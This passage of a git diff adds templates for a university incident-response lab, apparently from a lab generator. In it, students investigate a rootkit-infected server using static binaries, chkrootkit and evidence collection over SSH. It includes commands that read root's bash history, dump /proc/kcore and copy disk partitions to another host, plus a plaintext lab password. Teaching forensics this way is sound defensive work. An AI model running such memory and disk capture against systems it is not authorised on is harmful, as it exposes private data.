+
+
+ <%= self.html_rendered %>
+
+
+
+
diff --git a/modules/generators/structured_content/hackerbot_config/live_analysis_v2/templates/license.md.erb b/modules/generators/structured_content/hackerbot_config/live_analysis_v2/templates/license.md.erb
new file mode 100644
index 000000000..c11478e8e
--- /dev/null
+++ b/modules/generators/structured_content/hackerbot_config/live_analysis_v2/templates/license.md.erb
@@ -0,0 +1,6 @@
+## License
+This lab by [*Z. Cliffe Schreuders*](http://z.cliffe.schreuders.org) at Leeds Beckett University is licensed under a [*Creative Commons Attribution-ShareAlike 3.0 Unported License*](http://creativecommons.org/licenses/by-sa/3.0/deed.en_GB).
+
+Included software source code is also licensed under the GNU General Public License, either version 3 of the License, or (at your option) any later version.
+
+
diff --git a/modules/generators/structured_content/hackerbot_config/live_analysis_v2/templates/live_evidence_collection.md.erb b/modules/generators/structured_content/hackerbot_config/live_analysis_v2/templates/live_evidence_collection.md.erb
new file mode 100644
index 000000000..705728373
--- /dev/null
+++ b/modules/generators/structured_content/hackerbot_config/live_analysis_v2/templates/live_evidence_collection.md.erb
@@ -0,0 +1,350 @@
+## Live analysis
+
+After suspecting a compromise, before powering down the server for offline analysis, the first step is typically to perform some initial investigation of the live system. Live analysis aims to investigate suspicions that a compromise has occurred, and gather volatile information, which may potentially include evidence that would be lost by powering down the computer.
+
+**On the desktop VM,** ==ssh into the compromised server==
+
+```bash
+ssh <%= $compromised_server_ip %>
+```
+
+> Because the same users exist on both systems you can leave off the user name (normally ssh *username*@*server_ip*)
+
+**On the compromised_server VM (ssh):** To keep a record of what we are doing on the system, start the script command:
+
+```bash
+mkdir evid
+script -f evid/invst.log
+```
+> Note: *if you do this lab over multiple sessions*, be sure to save a copy of the log of your progress (evid/invst.log), and restart `script`.
+
+==LogBook question: Make a note of the risks and benefits associated with storing a record of what we are doing locally on the computer that we are investigating.==
+
+Consider the advantages of *handwritten* documentation of what investigators are doing.
+
+### Using a Live CD/DVD
+
+Many of the commands used to investigate what is happening on a system are standard Unix commands. However, it is advisable to run these from a read-only source, since software on your system may have been tampered with. Also, using read-only media minimises the changes made to your local filesystem, such as executable file access times.
+
+Next you will configure the compromised_server VM to have access to the FIRE (Forensic and Incident Response Environment) CD/DVD ISO (which is equivalent to inserting the optical disk into your server's DVD-tray). FIRE is an example of a Linux Live Disk that includes tools for forensic investigation. In addition to tools to boot to a version of Linux for offline investigation of evidence, the disk contains Linux tools for live analysis.
+
+Add the FIRE IR CD disk:
+
+In Hacktivity, click on the VM's settings (gear) icon and choose ==Change CD/DVD==.
+
+==Select the "fire-0.3.5b.iso"== file from the dropdown box. ==Click "Attach disk"==
+
+**Continuing on the compromised_server VM**, ==mount the disk==, so that we can access its contents:
+
+```bash
+sudo mount /media/cdrom0/ -o exec
+```
+
+On a typical system, many binary executables are dynamically linked; that is, these programs do not physically contain all the libraries (shared code) they use, and instead load that code from shared library files when the program runs. On Unix systems the shared code is typically contained in ".so" files, while on Windows ".dll" files contain shared code. The risks associated with using dynamically linked executables to investigate security breaches is that access times on the shared objects will be updated, and the shared code may also have been tampered with. For this reason it is safest to use programs that are statically linked; that is, have been compiled to physically contain a copy of all of the shared code that it uses.
+
+**On your Desktop VM (in a separate console tab)** ==look at which libraries are dynamically loaded== when you run a typical command:
+
+```bash
+ldd /bin/ls
+```
+
+Examine the output, and determine how many external libraries are involved.
+
+**On the compromised_server VM (ssh console)**: The FIRE disk contains a number of statically compiled programs to be used for investigations.
+
+==Look at the commands available:==
+
+```bash
+ls /media/cdrom0/statbins/linux2.2_x86/
+```
+
+==Check that these are indeed statically linked:==
+
+```bash
+ldd /media/cdrom0/statbins/linux2.2_x86/ls
+```
+
+==Compare the output to the previous command== run on your own Desktop system. The output will be distinctly different, stating that the program is not dynamically compiled.
+
+Note that, although an improvement, using statically linked programs such as these still do not guarantee that you can trust the output of the programs you run. ==Consider why, and make a note of this in your LogBook.==
+
+## First look around
+
+Run ls to view the contents of the home directory on the compromised_server.
+
+```bash
+cd
+ls
+```
+
+Run the static version
+```
+/media/cdrom0/statbins/linux2.2_x86/ls
+```
+
+Note the presence of a "u_r_powned" file in the output from the live disk version of ls! Running the local version of ls is not accurately reporting the files that exist! Lucky we thought to run another copy of ls.
+
+## Collecting live state manually
+
+The next step is to use various tools to capture information about the live system, for later analysis. One approach to storing the resulting evidence is to send results over the network via Netcat or SSH, without storing them locally. This has the advantage of not changing local files, and is less likely to tip off an attacker, rather than storing the evidence you are collecting on the compromised machine itself.
+
+**On your Desktop VM (not from the console still sshed into the server)**, ==create a directory for the evidence you are about to collect.==
+
+```bash
+mkdir evidence
+```
+
+### Saving output from the compromised server to your desktop
+
+**On the desktop VM (not from the sshed server)**, ==test sending the results of some commands over SSH to your Desktop VM==:
+
+```bash
+ssh <%= $compromised_server_ip %> "echo this command is running on the server"
+
+ssh <%= $compromised_server_ip %> "echo this command is running on the server" | tee evidence/test_output
+
+ls evidence
+
+cat evidence/test_output
+```
+
+> Take the time to make sure you understand which system each command above is running on.
+> tee prints to the screen as well as saving the output to disk (you can instead redirect the output to a file with `>`, but you won't see the output while the program runs.)
+
+### Comparing process lists
+
+Collect results of a process listing using ps over SSH to the compromised VM:
+
+```bash
+ssh -t <%= $compromised_server_ip %> "sudo ps aux" | tee evidence/local_ps_output
+```
+
+**On your Desktop VM**, find the newly created files and view the contents.
+
+> Hint: you may wish to use the Dolphin graphical file browser, then navigate to "/home/<%= $main_user %>/evidence".
+
+Run the statically compiled version of ls from the incident response disk to list the contents of /proc (this is provided dynamically by the kernel: a directory exists for every process on the system), and once again send the results to your Desktop VM...
+
+Run the command:
+
+```bash
+ssh <%= $compromised_server_ip %> "/media/cdrom0/statbins/linux2.2_x86/ls /proc" | tee evidence/proc_ls_static
+```
+
+**On your Desktop VM**, find the newly created files and ==compare the list of pids (numbers representing processes) output from the previous commands==. This is the second column of output in the ps\_out, with the numbers in proc\_ls\_static.
+
+Hint: you can do the comparison manually, or using commands such as "cut" (or [*awk*](http://lmgtfy.com/?q=use+awk+to+print+column)), "sort", and "diff". For example, `cat ps_out | awk '{ print $4 }'` will pipe the contents of the file ps\_out into the awk command, which will split on spaces, and only display the fourth field. Ensure this is displaying the list of pids, if not try selecting a different field. You could pipe this through to "sort". Then save that to a file (by appending " > pids\_ps\_out"). Remember "man awk", "man sort", and "man diff" will tell you about how to use the commands (and Google may also come in handy).
+
+Are the same processes shown each time? Can you explain why the outputs from different tools are giving you a different picture of the system? If not, that is very suspicious, and likely indicates a break-in, and that we probably shouldn't trust the output of local commands.
+
+> Note that some changes are to expected simply due to timing, such as short running processes, including the commands you are actually running to do your investigation. However, you wouldn't expect processes that are consistently running to not be visible in ps, etc.
+
+## Gathering live state using statically compiled programs
+
+Save a list of the files currently being accessed by programs:
+
+```bash
+ssh <%= $compromised_server_ip %> "/media/cdrom0/statbins/linux2.2_x86/lsof" | tee evidence/lsof_out
+```
+
+Save a list of network connections:
+
+```bash
+ssh -t <%= $compromised_server_ip %> "sudo netstat -apn" | tee evidence/netstat_out
+
+ssh -t <%= $compromised_server_ip %> "sudo /media/cdrom0/statbins/linux2.2_x86/netstat -apn" | tee evidence/netstat_static_out
+```
+> (Some commands such as this one may take awhile to run, wait until the Bash prompt returns)
+
+Save a list of the network resources currently being accessed by programs:
+
+```bash
+ssh -t <%= $compromised_server_ip %> "sudo /media/cdrom0/statbins/linux2.2_x86/lsof -P -i -n" | tee evidence/lsof_net_out
+```
+
+Save a copy of the routing table:
+
+```bash
+ssh <%= $compromised_server_ip %> "/media/cdrom0/statbins/linux2.2_x86/route" | tee evidence/route_out
+```
+
+Save a copy of the ARP cache:
+
+```bash
+ssh <%= $compromised_server_ip %> "/media/cdrom0/statbins/linux2.2_x86/arp -a" | tee evidence/arp_out
+```
+
+Save a list of the kernel modules currently loaded (as reported by the kernel):
+
+```bash
+ssh -t <%= $compromised_server_ip %> "sudo /media/cdrom0/statbins/linux2.2_x86/cat /proc/modules" | tee evidence/lsmod_out
+```
+
+Save a copy of the Bash history:
+
+```bash
+ssh -t <%= $compromised_server_ip %> "sudo /media/cdrom0/statbins/linux2.2_x86/cat /root/.bash_history" | tee evidence/bash_history
+```
+
+**Creating images of the system state**
+
+We can take a snapshot of the live state of the computer by dumping the entire contents of memory (what is in RAM/swap) into a file. On a Linux system /proc/kcore contains an ELF-formatted core dump of the kernel. Save a snapshot of the kernel state:
+
+```bash
+ssh -t <%= $compromised_server_ip %> "sudo /media/cdrom0/statbins/linux2.2_x86/dd if=/proc/kcore conv=noerror,sync" | tee evidence/kcore
+```
+==After 10 seconds or so press Ctrl-C to stop.==
+
+Next, we can copy entire partitions to our other system, to preserve the exact state of stored data, and so that we can conduct offline analysis without modifying the filesystem.
+
+Start by identifying the device files for the partitions on the compromised system:
+
+```bash
+df
+```
+
+Note that on this system the root partition (mounted on "/"), is /dev/sda1.
+
+> Help: on some VMs, you may need to replace "sda1" with "hda1".
+
+Then **you could** (see the tip below) copy byte-for-byte the contents of the entire root ("/") partition over the network (where /dev/sda1 was identified from the previous command):
+
+```bash
+ssh -t <%= $compromised_server_ip %> "/media/cdrom0/statbins/linux2.2_x86/dd if=/dev/sda1 conv=noerror,sync" | tee evidence/sda1.img
+```
+> Tip: Feel free to ==skip this step==. Running this will take some time, so you may wish to continue with the next step while the copying runs.
+
+This command could be repeated for each partition including swap partitions. For now, let's accept that we have all we need.
+
+**On your Desktop VM**, list all the files you have created:
+
+```bash
+ls -la /home/<%= $main_user %>/evidence
+```
+
+At this stage ==take a closer look through== some of the information you have collected.
+
+==LogBook Task:== Examine the contents of the various output files and identify anything that may indicate that the computer has been compromised by an attacker. Hint: does the network usage seem suspicious?
+
+### Collecting live state using scripts
+
+As you may have concluded from the previous tasks, manually collecting all this information from a live system can be a fairly time consuming process. Incident response data collection scripts can automate much of this process. A common data collection script "linux-ir.sh", is included on the FIRE disk, and is also found on the popular Helix IR disk.
+
+**On the compromised_server VM (ssh console tab from earlier)**, have a look through the script:
+
+```bash
+less /media/cdrom0/statbins/linux-ir.sh
+```
+
+Note that this is a Bash script, and each line contains commands that you could type into the Bash shell. Bash provides the command prompt on most Unix systems, and a Bash script is an automated way of running commands. This script is quite simple, with a series of commands (similar to some of those you have already run) to display information about the running system.
+
+Identify some commands within the script that collect information you have not already collected above.
+
+Exit viewing the script (press q).
+
+Run the data collection script, redirecting output to your Desktop VM:
+
+```bash
+ssh -t <%= $compromised_server_ip %> "cd /media/cdrom0/statbins; sudo /media/cdrom0/statbins/linux-ir.sh" | tee evidence/ir_out
+```
+
+**On your Desktop VM**, have a look at the output from the script:
+
+```bash
+less /home/<%= $main_user %>/evidence/ir_out
+```
+
+Use what you have learnt to spot some evidence of a security compromise.
+
+### Checking for rootkits
+
+An important concern when investigating an incident, is that the system (including user-space programs, libraries, and possibly even the OS kernel) may have been modified to hide the presence of changes made by an attacker. For example, the ps and ls commands may be modified, so that certain processes and files (respectively) are not displayed. The libraries used by various commands may have been modified, so that any programs using those libraries are provided with deceptive information. If the kernel has been modified, it can essentially change the behaviour of *any* program on the system, by changing the kernel's response to instructions from processes. For example, if a program attempts to *open* a file for viewing, the kernel could provide one set of content, while an attempt to *execute* the file may result in a completely different program running.
+
+Detecting the presence of rootkits is tricky, and prone to error. However, there are a number of techniques that, while not foolproof, can detect a number of rootkits. Methods of detection include: looking for inconsistencies between different ways of gathering data about the system state, and looking for known instances of malicious files.
+
+Chkrootkit is a Bash script that performs a number of tests for the presence of various rootkits.
+
+**On the compromised_server VM (ssh)**, have a quick look through the script, it is much more complex than the previous linux-ir.sh script:
+
+```bash
+less /media/cdrom0/statbins/chkrootkit-linux/chkrootkit
+```
+> Exit less
+
+Confirm that if we were to run ls, we would be running the local (dynamic) version, probably /bin/ls:
+
+```bash
+which ls
+```
+
+To understand why, look at the value of the environment variable \$PATH, which tells Bash where to look for programs:
+
+```bash
+echo $PATH
+```
+
+Set the \$PATH environment variable to use our static binaries wherever possible, so that when chkrootkit calls external programs it will (wherever possible) use the ones stored on the IR disk:
+
+```bash
+export PATH=$static:$PATH
+```
+
+Confirm that now if we were to run less, we would be running the static version:
+
+```bash
+which ls
+```
+
+This should report the path to our static binary on the FIRE disk.
+
+It is now safe to run chkrootkit[^1]:
+
+```bash
+ssh <%= $compromised_server_ip %> "PATH=$static:$PATH sudo /media/cdrom0/statbins/chkrootkit-linux/chkrootkit" | tee evidence/chkrootkit_out
+```
+> Help: you may get a message in the terminal before you type the password. You should still type the password for the script to run. The script should not take long to run.
+
+**On your Desktop VM**, have a look at the output:
+
+```bash
+less /home/<%= $main_user %>/evidence/chkrootkit_out
+```
+
+From the output, identify files or directories reported as "INFECTED", or suspicious.
+
+At this stage you should be convinced that this system is compromised, and infected with some form of rootkit.
+
+**On the compromised_server VM (ssh console tab)**
+
+**You could**, power down the compromised system, so that we can continue analysis offline:
+
+```bash
+/media/cdrom0/statbins/linux2.2_x86/sync; /media/cdrom0/statbins/linux2.2_x86/sync
+```
+> If you do not know what the sync command does, on your Desktop VM, run "info coreutils 'sync invocation'" for more information.
+>
+> At this point you could tell Hacktivity to force a Power Off. However, you might want to wait until you finish the Hackerbot challenges.
+
+Why might we want to force a power off (effectively "pulling the plug"), rather than going through the normal shutdown process (by running "halt" or "shutdown")?
+
+## Offline analysis of live data collection
+
+Note that even if the bash\_history was not saved, we can still recover commands that were run while the computer was running. This is possible by searching through the saved RAM (the kcore ELF dump we saved earlier).
+
+**On your Desktop VM**, run:
+
+```bash
+sudo -u <%= $main_user %> bash -c "strings -n 10 /home/<%= $main_user %>/evidence/kcore > /home/<%= $main_user %>/evidence/kcore_strings"
+```
+
+The above "strings" command extracts ASCII text from the binary core dump.
+
+Open the extracted strings, and look for evidence of the commands you ran before saving the kernel core dump:
+
+```bash
+less /home/<%= $main_user %>/evidence/kcore_strings
+```
+
+Now press the '/' key, and type a regex to search for commands you previously ran to collect information about the system. For example, try searching for "statbins/linux2.2_x86" (press 'n' for next).
+
+[^1]: Note that it would be better to not have to include \$PATH, and only use static versions. Unfortunately, FIRE does not include statically compiled versions of all of the commands that chkrootkit requires.
diff --git a/modules/generators/structured_content/hackerbot_config/live_analysis_v2/templates/live_investigation.md b/modules/generators/structured_content/hackerbot_config/live_analysis_v2/templates/live_investigation.md
new file mode 100644
index 000000000..d20dbd708
--- /dev/null
+++ b/modules/generators/structured_content/hackerbot_config/live_analysis_v2/templates/live_investigation.md
@@ -0,0 +1,389 @@
+# Analysis of a Compromised System - Part 1: Online Analysis and Data Collection
+
+## Getting started
+### VMs in this lab
+
+==Start these VMs== (if you haven't already):
+
+- hackerbot_server (leave it running, you don't log into this)
+- desktop
+- compromised_server
+
+All of these VMs need to be running to complete the lab.
+
+
+In the edit dialogue box ==select CD-ROM== as the Second Device.
+==Select the "fire-0.3.5b.iso"== file from the dropdown box.
+
+### Your login details for the "desktop" VM
+User: <%= $main_user %>
+Password: tiaspbiqe2r (**t**his **i**s **a** **s**ecure **p**assword **b**ut **i**s **q**uite **e**asy **2** **r**emember)
+
+You won't login to the hackerbot_server, but all the VMs need to be running to complete the lab.
+
+### For marks in the module
+1. **You need to submit flags**. Note that the flags and the challenges in your VMs are different to other's in the class. Flags will be revealed to you as you complete challenges throughout the module. Flags look like this: ==flag{*somethingrandom*}==. Follow the link on the module page to submit your flags.
+2. **You need to document the work and your solutions in a workbook**. This needs to include screenshots (including the flags) of how you solved each Hackerbot challenge and a writeup describing your solution to each challenge, and answering any "Workbook Questions". The workbook will be submitted later in the semester.
+
+## Hackerbot!
+
+
+This exercise involves interacting with Hackerbot, a chatbot who will task you to investigate the system. If you satisfy Hackerbot by completing the challenges, she will reveal flags to you.
+
+Work through the below exercises, completing the Hackerbot challenges as noted.
+
+
+## Introduction
+
+So you have reason to believe one of your servers has experienced a security compromise... What next? For this lab you investigate a server that is attacked and compromised.
+
+The investigation of a potential security compromise is closely related to digital forensics topics. As with forensic investigations, we also aim to maintain the integrity of our "evidence", *wherever possible* not modifying access times or other information. However, in a business incident response setting maintaining a chain of evidence may not be our highest priority, since we may be more concerned with other business objectives, such as assuring the confidentiality, integrity, and availability of data and services.
+
+During analysis, it is good practice to follow the order of volatility (OOV): collecting the most volatile evidence first (such as the contents of RAM, details of processes running, and so on) from a live system, then collecting less volatile evidence (such as data stored on disk) using offline analysis.
+
+## Live analysis
+
+After suspecting a compromise, before powering down the server for offline analysis, the first step is typically to perform some initial investigation of the live system. Live analysis aims to investigate suspicions that a compromise has occurred, and gather volatile information, which may potentially include evidence that would be lost by powering down the computer.
+
+
+==SSH into the compromised server:==
+
+
+
+**On the compromised VM (Redhat7.2):** To keep a record of what we are doing on the system, start the script command:
+
+```bash
+mkdir /tmp/evid
+script -f /tmp/evid/invst.log
+```
+> Note: *if you do this lab over multiple sessions*, be sure to save the log of your progress (/tmp/evid/invst.log), and restart `script`.
+
+==LogBook question: Make a note of the risks and benefits associated with storing a record of what we are doing locally on the computer that we are investigating.==
+
+Consider the advantages of *handwritten* documentation of what investigators are doing.
+
+Many of the commands used to investigate what is happening on a system are standard Unix commands. However, it is advisable to run these from a read-only source, since software on your system may have been tampered with. Also, using read-only media minimises the changes made to your local filesystem, such as executable file access times.
+
+During preparation, you configured the compromised VM to have access to the FIRE (Forensic and Incident Response Environment) CD/DVD ISO (which is equivalent to inserting the optical disk into your server's DVD-tray). FIRE is an example of a Linux Live Disk that includes tools for forensic investigation. In addition to being able to boot to a version of Linux for offline investigation of evidence, the disk contains Linux tools for live analysis.
+
+**On the compromised VM (Redhat7.2)**, ==mount the disk==, so that we can access its contents:
+
+```bash
+mount /dev/hdc /mnt/cdrom/
+```
+
+On a typical system, many binary executables are dynamically linked; that is, these programs do not physically contain all the libraries (shared code) they use, and instead load that code from shared library files when the program runs. On Unix systems the shared code is typically contained in ".so" files, while on Windows ".dll" files contain shared code. The risks associated with using dynamically linked executables to investigate security breaches is that access times on the shared objects will be updated, and the shared code may also have been tampered with. For this reason it is safest to use programs that are statically linked; that is, have been compiled to physically contain a copy of all of the shared code that it uses.
+
+**On your Desktop VM** ==look at which libraries are dynamically loaded== when you run a typical command:
+
+```bash
+ldd /bin/ls
+```
+
+Examine the output, and determine how many external libraries are involved.
+
+**On the compromised VM (Redhat7.2)**: The FIRE disk contains a number of statically compiled programs to be used for investigations. ==Check that these are indeed statically linked:==
+
+```bash
+ldd /mnt/cdrom/statbins/linux2.2_x86/ls
+```
+
+==Compare the output to the previous command== run on your own Desktop system. The output will be distinctly different, stating that the program is not dynamically compiled.
+
+Note that, although an improvement, using statically linked programs such as these still do not guarantee that you can trust the output of the programs you run. Consider why, and make a note of this.
+
+## Collecting live state manually
+
+The next step is to use tools to capture information about the live system, for later analysis. One approach to storing the resulting evidence is to send results over the network via Netcat or SSH, without storing them locally. This has the advantage of not changing local files, and is less likely to tip off an attacker, rather than storing the evidence on the compromised machine.
+
+### Comparing process lists
+
+**On your Desktop VM**, check ensure the local SSH server (sshd) is running on your system.
+
+**On the compromised VM (Redhat7.2)**, test sending the results of some commands (process lists using ps) over SSH to your Desktop VM:
+
+> Note: if the VM is not using a UK keyboard layout, the @ and " symbols may be reversed, and the | symbol is located at the \~. Alternatively, run `loadkeys uk` in the RedHat VM to swap to a UK keyboard layout
+
+```bash
+ssh <%= $main_user %>@*desktop-IP-address* "mkdir evidence"
+
+ps aux | ssh <%= $main_user %>@*desktop-IP-address* "cat > evidence/ps_out"
+```
+
+> (Where *desktop-IP-address* is the IP address of your *desktop VM*, which should be on the same subnet as your compromised VM)
+
+==LogBook question: Why might it not be a good idea to ssh to your own account (if you had one on a Desktop in real life) and type your own password from the compromised system? What are some more secure alternatives?==
+
+**On your Desktop VM**, find the newly created files and view the contents.
+
+> Hint: you may wish to use the Dolphin graphical file browser, then navigate to "/home/<%= $main_user %>/evidence".
+
+**On the compromised VM (Redhat7.2)**, run the statically compiled version of ls from the incident response disk to list the contents of /proc (this is provided dynamically by the kernel: a directory exists for every process on the system), and once again send the results to your Desktop VM...
+
+First, to save yourself from having to type `/mnt/cdrom/statbins/linux2.2_x86/` over and over, save that value in a Bash variable:
+
+```bash
+export static="/mnt/cdrom/statbins/linux2.2_x86/"
+```
+
+Now, to run the statically compiled version of ls, you can run:
+
+```bash
+$static/ls
+```
+
+Run the command:
+
+```bash
+$static/ls /proc | ssh <%= $main_user %>@*desktop-IP-address* "cat > evidence/proc_ls_static"
+```
+
+**On your Desktop VM**, find the newly created files and compare the list of pids (numbers representing processes) output from the previous commands. This is the second column of output in the ps\_out, with the numbers in proc\_ls\_static.
+
+Hint: you can do the comparison manually, or using commands such as "cut" (or [*awk*](http://lmgtfy.com/?q=use+awk+to+print+column)), "sort", and "diff". For example, `cat ps_out | awk '{ print $4 }'` will pipe the contents of the file ps\_out into the awk command, which will split on spaces, and only display the fourth field. Ensure this is displaying the list of pids, if not try selecting a different field. You could pipe this through to "sort". Then save that to a file (by appending " > pids\_ps\_out"). We have covered how to use diff previously. Remember "man awk", "man sort", and "man diff" will tell you about how to use the commands (and Google may also come in handy).
+
+Are the same processes shown each time? If not, that is very suspicious, and likely indicates a break-in, and that we probably shouldn't trust the output of local commands.
+
+### Gathering live state using statically compiled programs
+
+**On the compromised VM (Redhat7.2)**, save a copy of a list inodes of removed files that are still open or executing:
+
+```bash
+$static/ils -o /dev/hda1 | ssh <%= $main_user %>@*Desktop-IP-address* "cat > evidence/deleted_out"
+```
+> Tip: on VMware VMs, you may need to replace "hda1" with "sda1".
+
+Save a list of the files currently being accessed by programs:
+
+```bash
+$static/lsof | ssh <%= $main_user %>@*Desktop-IP-address* "cat > evidence/lsof_out"
+```
+
+**On your Desktop VM**, open evidence/lsof\_out.
+
+==LogBook question: Are any of these marked as "(deleted)"? How does this compare to the ils output? What does this indicate?==
+
+**On the compromised VM (Redhat7.2)**,
+
+Save a list of network connections:
+
+```bash
+$static/netstat -a | ssh <%= $main_user %>@*Desktop-IP-address* "cat > evidence/netstat_out"
+```
+> (Some commands such as this one may take awhile to run, wait until the Bash prompt returns)
+
+Save a list of the network resources currently being accessed by programs:
+
+```bash
+$static/lsof -P -i -n | ssh <%= $main_user %>@*Desktop-IP-address* "cat > evidence/lsof_net_out"
+```
+
+Save a copy of the routing table:
+
+```bash
+$static/route | ssh <%= $main_user %>@*Desktop-IP-address* "cat > evidence/route_out"
+```
+
+Save a copy of the ARP cache:
+
+```bash
+$static/arp -a | ssh <%= $main_user %>@*Desktop-IP-address* "cat > evidence/arp_out"
+```
+
+Save a list of the kernel modules currently loaded (as reported by the kernel):
+
+```bash
+$static/cat /proc/modules | ssh <%= $main_user %>@*Desktop-IP-address* "cat > evidence/lsmod_out"
+```
+
+**Creating images of the system state**
+
+We can take a snapshot of the live state of the computer by dumping the entire contents of memory (what is in RAM/swap) into a file. On a Linux system /proc/kcore contains an ELF-formatted core dump of the kernel. Save a snapshot of the kernel state:
+
+```bash
+$static/dd if=/proc/kcore conv=noerror,sync | ssh <%= $main_user %>@*Desktop-IP-address* "cat > evidence/kcore"
+```
+
+Next, we can copy entire partitions to our other system, to preserve the exact state of stored data, and so that we can conduct offline analysis without modifying the filesystem.
+
+Start by identifying the device files for the partitions on the compromised system (Redhat7.2):
+
+```bash
+df
+```
+
+Note that on this system the root partition (mounted on "/"), is /dev/hda1.
+
+> Help: on VMware VMs only, you may need to replace "hda1" with "sda1".
+
+Then, copy byte-for-byte the contents of the root ("/") partition (where /dev/hda1 was identified from the previous command:
+
+```bash
+$static/dd if=/dev/hda1 conv=noerror,sync | ssh <%= $main_user %>@*Desktop-IP-address* "cat > evidence/hda1.img"
+```
+> Tip: Running this will take some time, so you may wish to continue with the next step while the copying runs.
+
+This command could be repeated for each partition including swap partitions. For now, let's accept that we have all we need.
+
+**On your Desktop VM**, list all the files you have created:
+
+```bash
+ls -la /home/<%= $main_user %>/evidence
+```
+
+At this stage look through some of the information you have collected. For example:
+
+```bash
+less /home/<%= $main_user %>/evidence/lsof_net_out
+```
+
+Examine the contents of the various output files and identify anything that may indicate that the computer has been compromised by an attacker. Hint: does the network usage seem suspicious?
+
+### Collecting live state using scripts
+
+As you may have concluded from the previous tasks, manually collecting all this information from a live system can be a fairly time consuming process. Incident response data collection scripts can automate much of this process. A common data collection script "linux-ir.sh", is included on the FIRE disk, and is also found on the popular Helix IR disk.
+
+**On the compromised VM (Redhat7.2)**, have a look through the script:
+
+```bash
+less /mnt/cdrom/statbins/linux-ir.sh
+```
+
+Note that this is a Bash script, and each line contains commands that you could type into the Bash shell. Bash provides the command prompt on most Unix systems, and a Bash script is an automated way of running commands. This script is quite simple, with a series of commands (similar to some of those you have already run) to display information about the running system.
+
+Identify some commands within the script that collect information you have not already collected above.
+
+Exit viewing the script (press q).
+
+Run the data collection script, redirecting output to your Desktop VM:
+
+```bash
+cd /mnt/cdrom/statbins/
+
+./linux-ir.sh | ssh <%= $main_user %>@*Desktop-IP-address* "cat > evidence/ir_out"
+```
+
+**On your Desktop VM**, have a look at the output from the script:
+
+```bash
+less /home/<%= $main_user %>/evidence/ir_out
+```
+
+Use what you have learnt to spot some evidence of a security compromise.
+
+### Checking for rootkits
+
+An important concern when investigating an incident, is that the system (including user-space programs, libraries, and possibly even the OS kernel) may have been modified to hide the presence of changes made by an attacker. For example, the ps and ls commands may be modified, so that certain processes and files (respectively) are not displayed. The libraries used by various commands may have been modified, so that any programs using those libraries are provided with deceptive information. If the kernel has been modified, it can essentially change the behaviour of *any* program on the system, by changing the kernel's response to instructions from processes. For example, if a program attempts to *open* a file for viewing, the kernel could provide one set of content, while an attempt to *execute* the file may result in a completely different program running.
+
+Detecting the presence of rootkits is tricky, and prone to error. However, there are a number of techniques that, while not foolproof, can detect a number of rootkits. Methods of detection include: looking for inconsistencies between different ways of gathering data about the system state, and looking for known instances of malicious files.
+
+Chkrootkit is a Bash script that performs a number of tests for the presence of various rootkits.
+
+**On the compromised VM (Redhat7.2)**, have a quick look through the script, it is much more complex than the previous linux-ir.sh script:
+
+```bash
+less /mnt/cdrom/statbins/chkrootkit-linux/chkrootkit
+```
+> Exit less
+
+Confirm that if we were to run ls, we would be running the local (dynamic) version, probably /bin/ls:
+
+```bash
+which ls
+```
+
+To understand why, look at the value of the environment variable \$PATH, which tells Bash where to look for programs:
+
+```bash
+echo $PATH
+```
+
+Set the \$PATH environment variable to use our static binaries wherever possible, so that when chkrootkit calls external programs it will (wherever possible) use the ones stored on the IR disk:
+
+```bash
+export PATH=$static:$PATH
+```
+
+Confirm that now if we were to run less, we would be running the static version:
+
+```bash
+which ls
+```
+
+This should report the path to our static binary on the FIRE disk.
+
+It is now safe to run chkrootkit[^3]:
+
+```bash
+./chkrootkit-linux/chkrootkit | ssh <%= $main_user %>@*Desktop-IP-address* "cat > evidence/chkrootkit_out"
+```
+> Help: you may get a message in the terminal before you type the password. You should still type the password for the script to run. The script should not take long to run.
+
+**On your Desktop VM**, have a look at the output:
+
+```bash
+less /home/<%= $main_user %>/evidence/chkrootkit_out
+```
+
+From the output, identify files or directories reported as "INFECTED", or suspicious.
+
+Also, note that the .bash_history is reportedly linked to another file.
+
+**On the compromised VM (Redhat7.2)**, investigate the Bash history:
+
+```bash
+$static/ls -la /root/.bash_history
+```
+
+What does the output mean? What does this mean for the logging of the commands run by root?
+
+At this stage you should be convinced that this system is definitely compromised, and infected with some form of rootkit.
+
+Save a record of your activity to your Desktop VM:
+
+```bash
+cat /tmp/evid/invst.log | ssh <%= $main_user %>@*Desktop-IP-address* "cat > evidence/script_log"
+```
+
+Power down the compromised system (Redhat7.2), so that we can continue analysis offline:
+
+```bash
+$static/sync; $static/sync
+```
+> If you do not know what the sync command does, on your Desktop VM, run "info coreutils 'sync invocation'" for more information.
+>
+> Tell the oVirt Virtualization Manager to force a Power Off.
+
+Why might we want to force a power off (effectively "pulling the plug"), rather than going through the normal shutdown process (by running "halt" or "shutdown")?
+
+## Offline analysis of live data collection
+
+Note that even though the bash\_history was not saved (as we discovered above), we can still recover commands that were run the last time the computer was running. This is possible by searching through the saved RAM (the kcore ELF dump we saved earlier).
+
+**On your Desktop VM**, run:
+
+```bash
+sudo -u <%= $main_user %> bash -c "strings -n 10 /home/<%= $main_user %>/evidence/kcore > /home/<%= $main_user %>/evidence/kcore_strings"
+```
+
+The above "strings" command extracts ASCII text from the binary core dump.
+
+Open the extracted strings, and look for evidence of the commands you ran before saving the kernel core dump:
+
+```bash
+less /home/<%= $main_user %>/evidence/kcore_strings
+```
+
+Now press the '/' key, and type a regex to search for commands you previously ran to collect information about the system. For example, try searching for "ssh <%= $main_user %>" (press 'n' for next).
+
+## What's next ...
+
+In the next lab you will analyse the artifacts you have collected, to determine what has happened on the system.
+
+**Important: save the evidence you have collected, as this will be used as the basis for the next lab.**
+
+ls -la /home/<%= $main_user %>/evidence you may have to be in root or without and remember when looking at the file you've created is from the outside the VM.
+
+[^1]: In reality, if we *knew* the system was compromised, we would likely *leave it powered off*, and move straight to offline analysis.
+
+[^2]: Note that it would be better to not have to include \$PATH, and only use static versions. Unfortunately, FIRE does not include statically compiled versions of all of the commands that chkrootkit requires.
diff --git a/modules/generators/structured_content/hackerbot_config/live_analysis_v2/templates/resources.md.erb b/modules/generators/structured_content/hackerbot_config/live_analysis_v2/templates/resources.md.erb
new file mode 100644
index 000000000..8b1378917
--- /dev/null
+++ b/modules/generators/structured_content/hackerbot_config/live_analysis_v2/templates/resources.md.erb
@@ -0,0 +1 @@
+
diff --git a/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/centos-7-x64.yml~upstream_stretch_kde_update b/modules/services/unix/database/mysql_stretch_compatible/mysql/spec/acceptance/nodesets/centos-7-x64.yml~upstream_stretch_kde_update
new file mode 100644
index 000000000..5eebdefbf
--- /dev/null
